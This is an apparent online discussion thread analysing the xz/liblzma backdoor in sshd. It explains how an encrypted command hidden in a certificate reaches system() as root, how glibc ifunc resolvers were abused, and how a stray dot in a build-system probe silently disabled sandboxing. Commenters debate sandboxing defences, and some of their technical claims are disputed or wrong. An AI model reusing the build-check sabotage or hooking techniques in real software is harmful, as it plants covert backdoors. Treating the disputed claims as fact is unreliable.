One question I have on this: if the backdoor had not been discovered due to the performance issue (which, as I understand it, was purely an oversight/fixable deficiency in the code), what would the chances have been of discovering it later, and are there tools that would have picked it up? Those questions are IMO relevant to understanding whether this kind of backdoor is the first of its kind, or just the first one that was uncovered.
EDIT: Here's some more RE work on the matter. Has some symbol remapping information that was extracted from the prefix trie the backdoor used to hide strings. Looks like it tried to hide itself even from RE/analysis, too.
https://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9...
Full list of decoded strings here:
https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01
--
For someone unfamiliar with openssl's internals (like me): The N value, I presume, is pulled from the `n` field of `rsa_st`:
https://github.com/openssl/openssl/blob/56e63f570bd5a479439b...
Which is a `BIGNUM`:
https://github.com/openssl/openssl/blob/56e63f570bd5a479439b...
Which appears to be a variable length type.
The backdoor pulls this from the certificate received from a remote attacker, attempts to decrypt it with ChaCha20, and if it decrypts successfully, passes it to `system()`, which is essentially a simple wrapper that executes a line of shell script as whichever user the process is currently running.
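For illustration, reading that modulus through OpenSSL's public API looks roughly like this (a sketch of the concept only; the actual backdoor hooks the relevant functions rather than calling them like this, and `get_modulus_bytes` is just a name I made up):

    #include <openssl/bn.h>
    #include <openssl/rsa.h>
    #include <stdlib.h>

    /* Copy the variable-length modulus N out of an RSA key into a fresh buffer.
     * Returns the byte length, or -1 on error. Caller frees *out. */
    int get_modulus_bytes(const RSA *rsa, unsigned char **out)
    {
        const BIGNUM *n = NULL;
        RSA_get0_key(rsa, &n, NULL, NULL);   /* n is the `n` field of rsa_st */
        if (n == NULL)
            return -1;

        int len = BN_num_bytes(n);           /* length depends on the key */
        *out = malloc(len);
        if (*out == NULL)
            return -1;
        return BN_bn2bin(n, *out);           /* big-endian bytes of N */
    }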
If I'm understanding things correctly, this is worse than a public key bypass (which I, and I think a number of others, presumed it might be) - a public key bypass would, in theory, only allow you access as the user you're logging in with. Presumably, hardened SSH configurations would disallow root access.
However, since this is an RCE in the context of e.g. an sshd process itself, this means that sshd running as root would allow the payload to itself run as root.
Wild. This is about as bad as a widespread RCE can realistically get.
> However, since this is an RCE in the context of e.g. an sshd process itself, this means that sshd running as root would allow the payload to itself run as root.
With the right sandboxing techniques, SELinux and mitigations could prevent the attacker from doing anything with root permissions. However, applying a sandbox to an SSH daemon effectively is very difficult.
Could you explain how SELinux could ever sandbox against RCE in sshd? Its purpose is to grant login shells to arbitrary users, after all.
You could refactor sshd so most network payload processing is delegated to sandboxed sub-processes. Then an RCE there has less capabilities to exploit directly. But, I think you would have to assume an RCE can cause the sub-process to produce wrong answers. So if the answers are authorization decisions, you can transitively turn those wrong answers into RCE in the normal login or remote command execution context.
But, the normal login or remote command execution is at least audited. And it might have other enforcement of which accounts or programs are permitted. A configuration disallowing root could not be bypassed by the sub-process.
You could also decide to run all user logins/commands under some more confined SE-Linux process context. Then, the actual user sessions would be sandboxed compared to the real local root user. Of course, going too far with this may interfere with the desired use cases for SSH.
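Very roughly, the delegation idea looks like this (a hypothetical sketch, not OpenSSH code; the nobody uid/gid and parse_untrusted() are made up for illustration):

    #include <string.h>
    #include <sys/types.h>
    #include <sys/wait.h>
    #include <grp.h>
    #include <unistd.h>

    #define UNPRIV_UID 65534   /* e.g. "nobody" -- assumption for illustration */
    #define UNPRIV_GID 65534

    /* Stand-in for the risky work: parse attacker-controlled bytes. */
    static int parse_untrusted(const char *in, size_t inlen, char *out, size_t outlen)
    {
        if (inlen >= outlen)
            return -1;
        memcpy(out, in, inlen);
        out[inlen] = '\0';
        return 0;
    }

    /* Run the parser in a forked, privilege-dropped child; the parent only ever
     * treats the child's output as untrusted data, never as an auth decision. */
    int delegate_parse(const char *in, size_t inlen, char *out, size_t outlen)
    {
        int fds[2];
        if (outlen == 0 || pipe(fds) == -1)
            return -1;

        pid_t pid = fork();
        if (pid == 0) {
            close(fds[0]);
            /* Drop privileges before touching untrusted input. */
            if (setgroups(0, NULL) != 0 || setgid(UNPRIV_GID) != 0 || setuid(UNPRIV_UID) != 0)
                _exit(1);
            char tmp[4096];
            if (parse_untrusted(in, inlen, tmp, sizeof tmp) != 0)
                _exit(1);
            write(fds[1], tmp, strlen(tmp));
            _exit(0);
        }

        close(fds[1]);
        ssize_t n = read(fds[0], out, outlen - 1);
        close(fds[0]);
        if (n >= 0)
            out[n] = '\0';

        int status = 0;
        waitpid(pid, &status, 0);
        return (n >= 0 && WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -1;
    }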
I thought that OpenSSH's sshd already separates itself into a privileged process and a low-privilege process. I don't know any details about that. Here's what Google showed me for that: https://github.com/openssh/openssh-portable/blob/master/READ...
If you look at the diagram of privsep, the authentication process is part of the privileged binary, which is where this RCE lives
The signature validation could be moved into an unprivileged process forked from that one.
That's an easy thing to say after the fact indeed but yes. In fact after such a disastrous backdoor I wouldn't be surprised if OpenSSH moved all code calling external libraries to unprivileged processes to make sure such an attack can never have such a dramatic effect (an auth bypass would still likely be possible, but that's still way better than a root RCE…).
At this point “All libraries could be malicious” is a threat model that must be considered for something as security critical as OpenSSH.
I don't think that's a threat model that OpenSSH should waste too much time on. Ultimately this is malicious code in the build machine compiling a critical system library. That's not reasonable to defend against.
Keep in mind that upstream didn't even link to liblzma. Debian patched it to do so. OpenSSH should defend against that too?
It is possible to prevent libraries from patching functions in other libraries; make those VM regions unwritable, don't let anyone make them writable, and adopt PAC or similar hardware protection so the kernel can't overwrite them either.
That does not sound like the type of machine that I want to work on. I still require a general purpose computer.
Why does a general purpose computer need to overwrite crypto functions in sshd?
That's already done, but in this case the attack happened in a glibc ifunc and those run before the patching protection is enabled (since an ifunc has to patch the PLT).
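For anyone who hasn't met ifuncs, here is a minimal GCC/glibc illustration of that window (not the backdoor's code): the resolver below runs during relocation, before main() and before RELRO makes the GOT read-only.

    #include <stdio.h>

    static int impl(void) { return 42; }

    /* The resolver runs at load time, during relocation -- i.e. before the
     * read-only protection on the GOT/PLT has been applied. The xz backdoor
     * abused exactly this window to install its hooks. */
    static int (*resolve_f(void))(void)
    {
        return impl;
    }

    int f(void) __attribute__((ifunc("resolve_f")));

    int main(void)
    {
        printf("%d\n", f());   /* by now the resolver has already run */
        return 0;
    }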
Any one of us, if we sat on the OpenSSH team, would flip the middle finger. What code is the project supposed to write when nothing on main dynamically loaded liblzma? It was brought in from a patch they don't have realistic control over.
This is a Linux problem, and the problem is systemd, which is who brought the lib into memory and init'd it.
> This is a Linux problem, and the problem is systemd, which is who brought the lib into memory and init'd it.
Not at all, it is a distro issue because a few distros such as Debian chose to patch openssh to bring in systemd support [1].
Other systemd-based distros like Arch Linux remain unaffected because they don't carry this patch.
1: https://sources.debian.org/src/openssh/1%3A9.7p1-2/debian/pa...
Yet Red Hat and others applied this patch, as systemd is so incapable of reliably launching processes that it kept killing sshd without it.
What a complete failure of an init system's job, and the patch was applied due to systemd not resolving the issue in another way.
This is the problem with systemd. Way, way way too much complexity.
Brought in from a patch they refused to accept because of this exact risk.
OpenSSH has refused this patch, the one that enables this in Debian, multiple times as a risk of pre-auth code execution as root.
So maybe just don't patch sshd?
It wouldn't matter in this case, since the exploit could simply rewrite the function that calls out to the unprivileged process. If you already have malicious code in your privileged parent process there's no way to recover from that.
Exactly. The attack came in by hitching a ride on to systemd.
sshd is not the problem. the ldd/monolith architecture surrounding systemd is.
What if I duplicated this attack but instead targeted dbus or any other thing that systemd is managing?
No, the problem is that someone had access to backdoor code that runs in a privileged process.
That just raises the hurdle for the attacker. The attacker in this case has full control to replace any function within ssh with their own version, and the master process of sshd will always need the ability to fork and still be root on the child process before dropping privileges. I don't see any way around that. They only needed to override one function this time, but if you raise the bar they would just override more functions and still succeed.
In highly safety-critical systems you have software (and hardware) diversity, where multiple pieces of software, developed independently, have to vote on the result. Maybe highly critical pieces of Linux like the login process should be designed the same way, so that two binaries without common dependencies would need to accept the login for the user to get privileges.
Exactly how to do it (especially transparently for the user), I have no idea though. Maybe sending ssh login requests to two different sshd implementations and if they don’t do the same things (same system calls), they are both killed.
Or some kind of two step login process where the first login only gives access to the sandbox of the second login process.
But in general I assume the Linux attack surface is too big to do software diversity for all of it.
> login process
RCE doesn't really follow a login-process design. As soon as you've got RCE you can be considered pwned.
If not now, then at the time the next locally exploitable vulnerability comes up. There are plenty.
> The attacker in this case has full control to replace any function within ssh with their own version
Not true. They have this ability only for binaries that are linked to liblzma. If sshd were to be decomposed into multiple processes, not all of them would (hopefully) depend on all the libraries that the original sshd depended on.
It's possible to spawn an sshd as an unprivileged or partially-capabilitized process. Such a sandbox isn't the default deployment, but it's done often enough and would work as designed to prevent privilege elevation above the sshd process.
How can sshd spawn interactive sessions for other users if it's sandboxed?
SELinux does not rely on the usual UID/GID to determine what a process can do. System services, even when running as "root", are running as confined users in SELinux. Confined root cannot do anything which SELinux policy does not allow it to do. This means you can let sshd create new sessions for non-root users while still blocking it from doing the other things which unconfined root would be able to do. This is still a lot of power but it's not the godlike access which a person logged in as (unconfined) root has.
Doesn't matter. A malicious sshd able to run commands as arbitrary users can just run malicious commands as those users.
We'd need something more like a cryptographically attested setreuid() and execve() combination that would run only commands signed with the private key of the intended user. You'd want to use a shared clock or something to protect against replay attacks
Yes, this won't directly protect against an attacker whose goal is to create a botnet, mine some crypto on your dime, etc. However, it will protect against corruption of the O/S itself and, in tandem with other controls, can limit the abilities an attacker has, and ensure things like auditing are still enforced (which can be tied to monitoring, and also used for forensics).
Whether it's worth it or not depends on circumstances. In many cloud environments, nuking the VM instance and starting over is probably easier than fiddling with SELinux.
even easier is to STOP HOSTING SSHD ON IPV4 ON CLEARNET
at minimum, ipv6 only if you absolutely must do it (it absolutely cuts the scans way down)
better is to only host it on vpn
even better is to only activate it with a portknocker, over vpn
even better-better is to set up a private ipv6 peer-to-peer cloud and socat/relay to the private ipv6 network (yggdrasil comes to mind, but there's other solutions to darknet)
your sshd you need for server maintenance/scp/git/rsync should never be hosted on ipv4 clearnet where a chinese bot will find it 3 secs after the route is established after boot.
How about making ssh as secure as (or more secure than) the VPN you'd put it behind? Considering the amount of vulnerabilities in corporate VPNs, I'd even put my money on OpenSSH today.
It's not like this is SSH's fault anyway, a supply chain attack could just as well backdoor some Fortinet appliance.
Defence in depth. Which of your layers is "more secure" isn't important if none are "perfectly secure", so having an extra (independent) layer such as a VPN is a very good idea.
Honestly the only VPN I'd rank above ssh in terms of internet-worthiness is WireGuard.
Who cares about scans? Who cares if a scan comes in 4 or 6?
Forget IPv6, just moving SSH off of port 22 stops the vast majority of drive-by attacks against sshd on the open Internet.
OpenSSH has a much smaller attack surface, is thoroughly vetted by the best brains on the planet, and is privilege separated and sandboxed. What VPN software comes even close to that?
The only software remotely in the same league is a stripped down Wireguard. There is a reason the attacker decided to attack liblzma instead of OpenSSH.
Plausibly by having set-user-ID capability but not others an attacker might need.
But in the more common case it just doesn't: you have an sshd running on a dedicated port for the sole purpose of running some service or another under a specific sandboxed UID. That's basically the github business model, for example.
I need full filesystem access, VIM, ls, cd, grep, awk, df, du at the very least. Sometimes perl, find, ncdu, and other utilities are necessary as well. Are you suggesting that each tool have its own SSH process wrapping it?
Maybe write a shell to coordinate between them? It should support piping and output redirection, please.
Sigh. I'm not saying there's a sandboxed sshd setup that has equivalent functionality to the default one in your distro. I'm not even saying that there's one appropriate for your app.
I'm saying, as a response to the point above, that sandboxing sshd is absolutely a valid defense-in-depth technique for privilege isolation, that it would work against attacks like this one to prevent whole-system exploitation, and that it's very commonly deployed in practice (c.f. running a git/ssh server a-la github).
Git’s use of the ssh protocol as a transport is a niche use case that ignores the actual problem. No one is seriously arguing that you can’t sandbox that constrained scenario but it’s not really relevant since it’s not the main purpose of the secure shell daemon.
The focus on the first S is good, yes, but SSH has another S and an H that needs focus as well.
Even though sshd must run as root (in the usual case), it doesn't need unfettered access to kernel memory, most of the filesystem, most other processes, etc. However, you could only really sandbox sshd-as-root. In order for sshd to do its job, it does need to be able to masquerade as arbitrary non-root users. That's still pretty bad but generally not "undetectably alter the operating system or firmware" bad.
> Even though sshd must run as root (in the usual case), it doesn't need unfettered access to kernel memory, most of the filesystem, most other processes, etc
This is sort of overlooking the problem. While true, the processes spawned by sshd do need to be able to do all these things and so even if you did sandbox it, preserving functionality would all but guarantee an escape is trivial (...just spawn bash?).
SELinux context is passed down to child processes. If sshd is running as confined root (system_u:system_r:sshd_t or similar), then the bash spawned by RCE will be too. Even if sshd is allowed to masquerade as an unconfined non-root user, that user will (regardless of SELinux) be unable to read or write /dev/kmem, ignore standard file permissions, etc.
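You can see that inheritance for yourself with libselinux (a tiny sketch; compile with -lselinux):

    #include <stdio.h>
    #include <selinux/selinux.h>

    int main(void)
    {
        char *con = NULL;

        /* Prints the calling process's SELinux context, e.g.
         * system_u:system_r:sshd_t:s0 for something spawned by sshd.
         * A child keeps its parent's domain unless policy defines a transition. */
        if (getcon(&con) == 0) {
            printf("%s\n", con);
            freecon(con);
        } else {
            printf("no SELinux context available\n");
        }
        return 0;
    }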
I’ll admit to not being an expert in SELinux, but it seems like an impossibly leaky proposition. Root can modify systemd startup files, so just do that in a malicious way and reboot the system. That context won’t be propagated. And if you somehow prohibit root from doing that by SELinux policy then you end up with a system that can’t actually be administered.
[edit: sibling sweetjuly said it better than I could. I doubt that this much more than a fig leaf on any real world system given what sshd is required to have to do.]
SELinux domains are decoupled from Linux users. If sshd does not have SELinux permission to edit those files, it will simply be denied, even if sshd is run as root.
Which amounts to the un-administerable system I mentioned. If it’s not possible to modify systemd config files using ssh, what happens when you need to edit them?
Really what they're proposing here is a non-modifiable system, where the root is read-only and no user can modify anything important.
Which is nice and all, but that implies a "parent" system that creates and deploys those systems. Which people likely want remote access to.. Probably by sshd...
You don't have to have an immutable system.
You can limit the exposure of the system from RCE in sshd with SELinux without preventing legitimate users from administering the system.
Granted that SELinux is overly complicated and has some questionable design decisions from a usability standpoint but it's not as limited or inflexible as many seem to think.
It really can stop a system service running as "root" from doing things a real administrator doesn't want it to do. You can couple it with other mechanisms to achieve defense in depth. While any system is only as strong as its weakest link, you can use SELinux to harden sshd so even with exploits in the wild it's not the weakest link vis-a-vis an attacker getting full unconfined root access. This may or may not be worth your time depending on what that box is doing and how connected to the rest of your infrastructure it is.
There seems to be a pervasive misunderstanding of the difference between standard UNIX/Linux discretionary access control and SELinux-style mandatory access control. The latter cannot be fooled into acting as a confused deputy anywhere near as easily as the former. The quality of the SELinux policy on a particular system plays a big part in how effective it is in practice but a good policy will be far harder to circumvent than anything the conventional permissions model is capable of.
Moreover, while immutability is obviously an even stronger level of protection, it is not necessary to make the system immutable to accomplish what I've described here while still allowing legitimately and separately authenticated users to fully administer the system.
SELinux is overly complicated, but it’s not hard to at least grasp the basics
The amount of people confusing DAC and MAC is concerning. You’ve done an excellent job explaining the topic.
Those files would be editable by something in the sysadm_t domain which is by default the domain of the root user after a successful authentication
This backdoor does not bypass remote authentication so it should be able to transition to the new domain that has access to these files
That's my point though--users expect to be able to do those things over ssh. Sandboxing sshd is hard because its child processes are expected to be able to do anything that an admin sitting at the console could do, up to and including reading/writing kernel memory.
I'm assuming SSH root login is disabled and sudo requires separate authentication to elevate, but yeah, if there's a way to elevate yourself to unconfined root trivially after logging in, this doesn't buy you anything.
Now, sandboxing sudo (in the general case) with SELinux probably isn't possible.
This does not matter either. The attack came in by loading into systemd via liblzma. It puts in a hook and then sits around waiting for sshd to load so it can learn the symbols, then proceeds to swap in the jumps.
sshd is a sitting duck. Bifurcating sshd into a multimodule scheme won't work because some part of it still has to be loaded by systemd.
This is a web of trust issue. In the .NET world, where reflection attacks happen to commercial software that features dynamically loaded assemblies, the only solution they could come up with is to sign all the things, then box up anything that doesn't have a signing mechanism and sign that too, even signing plain old zip files.
Some day we will all have to have keys. To keep the anon people from leaving they can get an anon key, but anons with keys will never get onto the chain where the big distros would ever trust their commits, until someone who forked over their passport and photos uses a trustable key to sign off on the commits, so that the distro builders can then greenlight pulling them in.
Then I guess, to keep the anons hopeful that they are still in the SDLC somewhere, their commits can go into the completely untrusted-unstable-crazytown release that no institution in their right mind would ever lay down in production.
Do you think state actors won’t just print out random passports?
Anons will just steal identities, and randos will get accused of hacking they didn't do.
You can definitely prevent a lot of file/executable accesses via SELinux by running sshd in the default sshd_t or even customizing your own sshd domain and preventing sshd from being able to run binaries in its own domain without a transition. What you cannot prevent though is certain things that sshd _requires_ to function like certain capabilities and networking access.
By default sshd has access to all files in /home/$user/.ssh/, but that could be prevented by giving private keys a new unique file context, etc.
SELinux would not prevent all attacks, but it can mitigate quite a few as part of a larger security posture
https://news.ycombinator.com/item?id=39879559
> Libselinux pulls in liblzma too
libselinux is the userspace tooling for selinux, it is irrelevant to this specific discussion as the backdoor does not target selinux in any way, and sshd does not have the capabilities required to make use of the libselinux tooling anyway
libselinux is just an unwitting vector to link liblzma with openssh
> With the right sandboxing techniques, SELinux and mitigations could prevent the attacker from doing anything with root permissions.
Please review this commit[0] where the sandbox detection was “improved”.
[0] https://git.tukaani.org/?p=xz.git;a=commitdiff;h=328c52da8a2...
I can't blame anyone who has missed that dot dissimulated at the beginning of the line.
https://git.tukaani.org/?p=xz.git;a=commitdiff;h=f9cf4c05edd...
For people like me whose C knowledge is poor, can you explain why this dot is significant? What does it do in actuality?
You are looking at a makefile, not C. The C code is in a string that is being passed to a function called `check_c_source_compiles()`, and this dot makes that code not compile when it should have -- which sets a boolean incorrectly, which presumably makes the build do something it should not do.
Interesting that validating the failure reason of an autotools compile check could be a security mitigation...
This is something that should have unit/integration tests inside the tooling itself, yeah. If your assertion is that when function X is called in environment X it should return Y, then that should be a test, especially when it’s load-bearing for security.
And tooling is no exception either. You should have tests that your tooling does the things it says on the tin and that things happen when flags are set and things don’t happen when they’re not set, and that the tooling sets the flags in the way you expect.
These aren’t even controversial statements in the JVM world etc. Just C tooling is largely still living in the 70s apart from abortive attempts to build the jenga tower even taller like autotools/autoconf/cmake/etc (incomprehensible, may god have mercy on your build). At least hand written make files are comprehensible tbh.
It's a "does this compile on this platform" test, not a "does this function return what we expect" test.
Unfortunately in the world of autoconf and multiple platforms and compilers, there was no standard way to understand why the compilation failed.
CMake actually, but yes.
As far as I can tell, the check is to see if a certain program compiles, and if so, disable something. The dot makes it so that it always fails to compile and thus always disables that something.
> if a certain program compiles, and if so, disable something.
Tiny correction: [...] enable something.
The idea is: If that certain program does not compile it is because something is not available on the system and therefore needs to be disabled.
That dot undermines that logic. The program fails because of a syntax error caused by the dot and not because something is missing.
It is easy to overlook because that dot is tiny and there are many such tests.
I had a similar problem with unit testing of a library. Expected failures need to be tested as well. As an example imagine writing a matrix inversion library. Then you need to verify that you get something like a division by zero error if you invert the zero matrix. You write a unit test for that and by mistake you insert a syntax error. Then you run the unit test and it fails as expected but not in the correct way.
It's subtle. It fails as expected but it fails because of unexpected wrong causes.
The solution: Check the errors carefully!
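A sketch of that lesson with a made-up invert() API: assert the specific failure reason, not merely that the call failed.

    #include <assert.h>
    #include <stdio.h>

    enum inv_err { INV_OK = 0, INV_SINGULAR, INV_BAD_INPUT };

    /* Toy 2x2 inversion standing in for the real library. */
    static enum inv_err invert2x2(const double m[4], double out[4])
    {
        double det = m[0] * m[3] - m[1] * m[2];
        if (det == 0.0)
            return INV_SINGULAR;
        out[0] =  m[3] / det; out[1] = -m[1] / det;
        out[2] = -m[2] / det; out[3] =  m[0] / det;
        return INV_OK;
    }

    int main(void)
    {
        double zero[4] = {0, 0, 0, 0}, out[4];

        /* Weak test: passes even if the failure is for the wrong reason
         * (e.g. a broken test input tripping INV_BAD_INPUT instead). */
        assert(invert2x2(zero, out) != INV_OK);

        /* Better: the failure must be the one we expect. */
        assert(invert2x2(zero, out) == INV_SINGULAR);

        puts("expected-failure test passed");
        return 0;
    }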
> The solution: Check the errors carefully!
The desire for "does this compile on this platform" checks comes from an era where there was pretty much no way to check the error. Somebody runs it on HP-UX with the "HP-UX Ansi C Compiler" they licensed from HP and the error it spits out isn't going to look like anything you recognize.
It's part of a test program used for feature detection (of a sandboxing functionality), and causes a syntax error. That in turn causes the test program to fail to compile, which makes the configure script assume that the sandboxing function is unavailable, and disables support for it.
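For anyone curious what such a test program looks like, here is a paraphrase of the shape of that probe (not the exact xz source; the real one checks for Linux Landlock support), with the sabotage described in a comment:

    /* Fed to the compiler by the build system's "does this compile?" check.
     * If it compiles, the sandbox feature is considered available. */
    #include <linux/landlock.h>
    #include <sys/syscall.h>
    #include <unistd.h>
    /* The malicious commit added a single line containing only
     *     .
     * right about here. A lone dot is a syntax error, so the probe always
     * fails to compile and sandbox support is silently disabled. */
    int main(void)
    {
        return SYS_landlock_create_ruleset != 0;
    }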
I specifically opened this diff to search for a sneaky dot, knowing it’s there, and wasn’t able to find it until I checked the revert patch
Same, I knew a sneaky dot was in the diff but had to ctrl-f the diff to find it.
Oh, that one is interesting, because it only breaks it in cmake.
I wonder if there is anything else cmake related that should be looked at.
Wasn't cmake support originally added to xz to use with Windows and MSVC?
But that's a check for a Linux feature. So the more interesting question would be, what in the Linux world might be building xz-utils with cmake, I guess using ExternalProject_Add or something similar.
Yes this is Linux.
At this time we don't know exactly how much is affected and what originally drew the attention of the attacker(s).
Yes, but don't forget that there are different kinds of sandboxes. SELinux never needs the cooperation of any program running on the system in order to correctly sandbox things. No change to Xz could ever make SELinux less effective.
But don't forget that xz is also used as part of dpkg for unpacking packages. The whole purpose of dpkg is to update critical system packages. Any SELinux policy that protects from a backdoored dpkg/xz installing a rootkit during the next kernel security update will also prevent installing real kernel security updates.
The particular way of attack in this OpenSSH backdoor can maybe be prevented, but we've got to realize that the attacker already had full root permissions, and there's no way of protecting from that.
SELinux policies are much more subtle than that. You don’t restrict what xz or liblzma can do, you restrict what the whole process can do. That process is either sshd or dpkg, and you can give them completely different access to the system, so that if dpkg tries to launch an interactive shell it fails, while sshd fails if it tries to overwrite a system file such as /bin/login or whatever. Neither would ordinarily do that, but the payload delivered via the back door might attempt it and wouldn’t succeed. And you would get a report stating what had happened, so if you’re paying attention the back door starts to become obvious.
Also I think dpkg switched to Zstd, didn’t it? Or am I misremembering?
But you’re not wrong; ultimately both sshd and dpkg are critical infrastructure. SELinux can prevent them from doing completely wrong things, but obviously it wouldn’t be useful for it to prevent them from doing their jobs. And those jobs are security critical already. SELinux is not a panacea, merely defense in depth.
That one's a separate attack vector, which is seemingly unused in the sshd attack. It only disables sandboxing of the xzdec(1) utility, which is not used in the sshd attack.
Which strongly suggests that they planned and/or executed more backdoors via Jia Tan’s access.
I guess xzdec was supposed to sandbox itself where possible so they disabled the sandbox feature check in the build system so that future payload exploits passed to xzdec wouldn’t have to escape the sandbox in order to do anything useful?
Sneaky.
Well, the definition of "improve" depends on one's goals.
Doesn't matter. This is a supply chain attack, not a vulnerability arising from a bug. All sandboxing the certificate parsing code would have done is make the author of the backdoor do a little bit more work to hijack the necessarily un-sandboxed supervisor process.
Applying the usual exploit mitigations to supply chain attacks won't do much good.
What will? Kill distribution tarballs. Make every binary bit for bit reproducible from a known git hash. Minimize dependencies. Run whole programs with minimal privileges.
Oh, and finally support SHA2 in git to forever forestall some kind of preimage attack against a git commit hash.
Oh boy, do I have the packaging system for you!
Right, though if I'm understanding correctly, this is targeting openssl, not just sshd. So there's a larger set of circumstances where this could have been exploited. I'm not sure if it's yet been confirmed that this is confined only to sshd.
The exploit, as currently found, seems to target OpenSSH specifically. It's possible that everything involving xz has been compromised, but I haven't read any reports that there is a path to malware execution outside of OpenSSH.
A quote from the first analysis that I know of (https://www.openwall.com/lists/oss-security/2024/03/29/4):
> Initially starting sshd outside of systemd did not show the slowdown, despite the backdoor briefly getting invoked. This appears to be part of some countermeasures to make analysis harder.
> a) TERM environment variable is not set
> b) argv[0] needs to be /usr/sbin/sshd
> c) LD_DEBUG, LD_PROFILE are not set
> d) LANG needs to be set
> e) Some debugging environments, like rr, appear to be detected. Plain gdb appears to be detected in some situations, but not others
Another reason to adopt OpenBSD style pledge/unveil in Linux.
Would that help? sshd, by design, opens shells. The backdoor payload was basically to open a shell, that is, the very thing that sshd has to do.
The pledge/unveil system is pretty great, but my understanding is that it does not do anything that the Linux equivalent interfaces (seccomp, I think) cannot do. It is just a simplified/saner interface to the same problem of "how can a program notify the kernel what its scope is?" The main advantage pledge/unveil bring to the table is that they are easy to use and cannot be turned off; optional security isn't.
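For anyone who hasn't seen them, a minimal OpenBSD-only sketch of the two calls:

    #include <err.h>
    #include <unistd.h>

    int main(void)
    {
        /* Filesystem visibility: only /etc/ssl is visible, read-only. */
        if (unveil("/etc/ssl", "r") == -1)
            err(1, "unveil");

        /* Syscall scope: only stdio-ish and read-only file promises remain.
         * Promises can only be narrowed later, never widened, and a violation
         * kills the process -- that's the "cannot be turned off" part. */
        if (pledge("stdio rpath", NULL) == -1)
            err(1, "pledge");

        return 0;
    }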
sshd is probably the softest target on most systems. It is generally expected (and set up by default) so that people can gain a root shell that provides unrestricted access.
sshd.service will typically score 9.6/10 for "systemd-analyze security sshd.service" where 10 is the worst score. When systemd starts a process, it does so by using systemd-nspawn to set up a (usually) restricted namespace and apply seccomp filters before the process is then executed. seccomp filters are inherited by child processes, which can then only further restrict privileges but not expand upon the inherited privileges. openssh-portable on Linux does apply seccomp filters to child processes but this is useless in this attack scenario because sshd is backdoored by the xz library, and the backdoored library can just disable/change those seccomp filters before sshd is executed.
sshd is particularly challenging to sandbox because if you were to restrict the namespace and apply strict seccomp filters via systemd-nspawn, a user gaining a root shell via sshd (or wanting to sudo/su as root) is then perhaps prevented from remotely debugging applications, accessing certain filesystems, interacting with network interfaces, etc depending on what level of sandboxing is applied from systemd-nspawn. This choice is highly user dependent and there are probably only limited sane defaults for someone who has already decided they want to use sshd. For example, sane defaults could include creating dedicated services with sandboxing tailored just for read-only sftp user filesystem access, a separate service for read/write sftp user filesystem access, sshd tunneling, unprivileged remote shell access, etc.
So for all practical purposes you can't sandbox ssh on a developer's machine much.
This is what PrivSep was supposed to do. sshd could fork an unprivileged and restricted process to do the signature validation, I suppose.
Mind boggling. How do you even decide what to do with privileges on a billion computers?
There's a reasonably high chance this was to target a specific machine, or perhaps a specific organization's set of machines. After that it could probably be sold off once whatever they were using it for was finished.
I doubt we'll ever know the intention unless the ABC's throw us a bone and tell us the results of their investigation (assuming they're not the ones behind it).
ABC?
3 letter intelligence agencies.
Baw, GCHQ is going to feel so left out.
NSA, CIA, FBI, DHS.
I'd disagree, based on reports of the actor trying to get this upstreamed in Debian and Fedora. Widespread net.
Classic example of this being Stuxnet, a worm that exploited four(!) different 0-days and infected hundreds of thousands of computers with the ultimate goal of destroying centrifuges associated with Iran’s nuclear program.
There aren’t a billion computers running ssh servers and the ones that do should not be exposed to the general internet. This is a stark reminder of why defense in depth matters.
Government organizations have many different teams. One might develop vulnerabilities while another runs operations with oversight for approving use of exploits and picking targets. Think bureaucracy with different project teams and some multi-layered management coordinating strategy at some level.
Can someone explain succinctly what the backdoor does? Do we even know yet? The backdoor itself is not a payload, right? Does it need a malicious archive to exploit it? Or does it hook into the sshd process to listen for malicious packets from a remote attacker?
The OP makes it sound like an attacker can send a malicious payload in the pre-auth phase of an SSH session - but why does he say that an exploit might never be available? Surely if we can reverse the code we can write a PoC?
Basically, how does an attacker control a machine with this backdoor on it?
You can imagine a door that opens if you knock on it just right. For anyone without the secret knock, it appears and functions as a wall. Without the secret knock, there might not even be a way to prove it opens at all.
This is sort of the situation here. xz tries to decode some data before it does anything shady; since the scheme is asymmetric, it can do that check with only the public counterpart of the key, so the secret key never has to be present in the binary.
The exploit code may never be available, because it is not practical to find the secret key, and it doesn't do anything obviously different if the payload doesn't decrypt successfully. The only way to produce the exploit code would be if the secret key is found somehow; and the only real way for that to happen would be for the people who developed the backdoor to leak it.
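Conceptually, the "knock check" looks something like this sketch (libsodium with Ed25519 for brevity; the real backdoor uses Ed448, and attacker_pk/is_valid_knock are invented names). The binary only ever holds the attacker's public key, which can verify a knock but never forge one:

    #include <sodium.h>

    /* Baked-in attacker public key (hypothetical). */
    static const unsigned char attacker_pk[crypto_sign_PUBLICKEYBYTES] = { 0 };

    int is_valid_knock(const unsigned char *payload, unsigned long long payload_len,
                       const unsigned char sig[crypto_sign_BYTES])
    {
        if (sodium_init() < 0)
            return 0;

        /* Verification needs only the public key; producing a signature that
         * passes this check requires the private key, which never leaves the
         * attacker. Everyone else just sees the check fail silently. */
        return crypto_sign_verify_detached(sig, payload, payload_len, attacker_pk) == 0;
    }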
Private key. In cryptography we distinguish keys which are symmetric (needed by both parties and unavailable to everyone else) as "Secret" keys, with the pair of keys used in public key cryptography identified as the Private key (typically known only to one person/system/whatever) and the Public key (known to anybody who cares).
Thus, in most of today's systems your password is a secret. You know your password and so does the system authenticating you. In contrast the crucial key for a web site's HTTPS is private. Visitors don't know this key, the people issuing the certificate don't know it, only the site itself has the key.
I remember this by the lyrics to "The Fly" by the band U2, "They say a secret is something you tell one other person. So I'm telling you, child".
> You know your password and so does the system authenticating you.
Nitpick, but no it shouldn’t.
The HASH of your password is recorded. You never submit your password, you submit that hash and they compare it.
The difference is that there are no two passwords that collide, but there are hashes that may.
And two identical passwords from two different users are not necessarily recognizable as such to someone with the hash list, because they are modified at rest with salts.
> Nitpick, but no it shouldn’t. The HASH of your password is recorded. You never submit your password, you submit that hash and they compare it.
Nitpick, but the password is submitted as-is by most client applications, and the server hashes the submitted password and compares it with the hash it has (of course, with salting).
> Nitpick, but the password is submitted as-is by most client applications, and the server hashes the submitted password and compares it with the hash it has (of course, with salting).
I never understood why clients are coded this way. It's trivially easy to send the salt to the client and have it do the hashing. Though I guess it doesn't really improve security in a lot of cases, because if you successfully MITM a web app you can just serve a compromised client.
> I never understood why clients are coded this way.
